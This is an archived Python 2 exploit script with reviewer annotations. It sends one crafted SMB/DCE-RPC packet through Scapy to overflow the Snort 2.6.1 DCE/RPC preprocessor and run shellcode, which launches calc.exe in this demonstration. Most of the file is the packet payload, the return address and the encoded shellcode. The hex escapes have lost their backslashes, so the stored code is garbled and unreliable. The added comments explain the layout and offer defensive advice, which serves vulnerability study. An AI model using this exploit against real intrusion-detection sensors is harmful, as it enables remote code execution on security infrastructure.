
# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
# Published : 2007-03-01
# Author : Trirat Puttaraksa


#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
# 
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit calls calc.exe on Windows XP SP2 + Snort 2.6.1
#
# Note: this exploit uses Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before using it.
#
#######################################################

import sys
from scapy import *
from struct import pack
# conf, IP, TCP and send() below all come from the scapy star import; pack is
# imported but never used in this script.
conf.verb = 0  # silence scapy's per-packet progress output

# NOTE(review): as archived, every hex literal below reads as plain ASCII
# ("x00x00x02xab") -- the backslashes of the \x escapes did not survive
# extraction. The string being built is therefore text, not the byte layout
# the section comments describe, and the script as stored does not produce
# the packet it documents. The comments below describe the intended layout.
#
# Intended structure: one TCP segment to port 139 (NetBIOS session service)
# carrying a single SMB exchange -- Tree Connect AndX to the IPC$ share,
# NT Create AndX opening \srvsvc, then two Write AndX requests whose data is
# a DCE/RPC header followed by the overflow content. Everything is emitted
# in one unsolicited PSH/ACK segment with no TCP handshake; the usage text
# calls the address a "fake destination", so presumably the inspecting
# sensor's preprocessor, not the addressed host, is what parses it.
#
# Defensive note: the affected component per the file header is the Snort
# 2.6.1 DCE/RPC preprocessor. Sensors still on that version should be
# upgraded or run with that preprocessor disabled; the observable symptom
# of a hit is the Snort service itself crashing or spawning an unexpected
# child process (calc.exe in this demonstration), which is worth alerting on
# from the sensor host's own process monitoring.

# NetBIOS Session Service
payload = "x00x00x02xab"

# SMB Header
payload += "xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00"
payload += "x00x00x00x00x00x00x00x00x00x00x00x00xffxfe"
payload += "x00x08x30x00"

# Tree Connect AndX Request
# The UTF-16LE path decodes to \\INS-KIRA\IPC$ (a hard-coded server name
# from the author's lab; the sensor presumably does not validate it).
payload += "x04xa2x00x52x00x08x00x01x00x27x00x00"
payload += "x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00"
payload += "x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00"
payload += "x3fx3fx3fx3fx3fx00"

# NT Create AndX Request
# Opens the named pipe \srvsvc (UTF-16LE in the last two lines).
payload += "x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00"
payload += "x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
payload += "x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00"
payload += "x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00"
payload += "x63x00x00x00"

# Write AndX Request #1
payload += "x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee"

# DCE/RPC header (version 5.0, packet type 0x0b, which is a bind). The
# commented-out variant differs from the live line only at bytes 8-9, the
# position of the fragment-length field -- the value the preprocessor is
# trusting when it sizes its reassembly buffer, as far as can be read here.
#payload += "x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00"
payload += "x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00"
payload += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
# Bind body: what appears to be the srvsvc interface UUID and the NDR
# transfer-syntax UUID, as in an ordinary bind -- TODO confirm against a
# decoded capture.
payload += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
payload += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
payload += "x2bx10x48x60x02x00x00x00"

# Write AndX Request #2
# Second write continues the same pipe; its data is the overflow content.
payload += "x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee"

# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)
# First four bytes are that address little-endian (an XP SP2 system-DLL
# address, so this is tied to one OS build); the rest adjusts esp before
# control reaches the shellcode that follows.
payload += "xedx1ex94x7cx90x81xc4xffxefxffxffx44"

# Shellcode body named in the comment above; it appears to begin with a
# self-decoding stub followed by the encoded payload -- TODO confirm.
payload += "x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
payload += "xd1x80xf5x83xebxfcxe2xf4x55x39xc4xf5xa9xd1x0bxb0"
payload += "x95x5axfcxf0xd1xd0x6fx7exe6xc9x0bxaax89xd0x6bxbc"
payload += "x22xe5x0bxf4x47xe0x40x6cx05x55x40x81xaex10x4axf8"
payload += "xa8x13x6bx01x92x85xa4xf1xdcx34x0bxaax8dxd0x6bx93"
payload += "x22xddxcbx7exf6xcdx81x1ex22xcdx0bxf4x42x58xdcxd1"
payload += "xadx12xb1x35xcdx5axc0xc5x2cx11xf8xf9x22x91x8cx7e"
payload += "xd9xcdx2dx7exc1xd9x6bxfcx22x51x30xf5xa9xd1x0bx9d"
payload += "x95x8exb1x03xc9x87x09x0dx2ax11xfbxa5xc1xafx58x17"
payload += "xdaxb9x18x0bx23xdfxd7x0ax4exb2xe1x99xcaxffxe5x8d"
payload += "xccxd1x80xf5"

payload += "x90"  # single trailing pad byte

# Usage check. This is Python 2 (print statement, tab indentation); it will
# not parse under Python 3.
if len(sys.argv) != 2:
	print "Usage snort_execute_dcerpc.py <fake destination ip>"
	sys.exit(1)

target = sys.argv[1]

# One IP/TCP segment, fixed source port 1025 -> 139, PSH+ACK, no prior
# handshake; sent at layer 3 so the kernel supplies the source address.
p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)
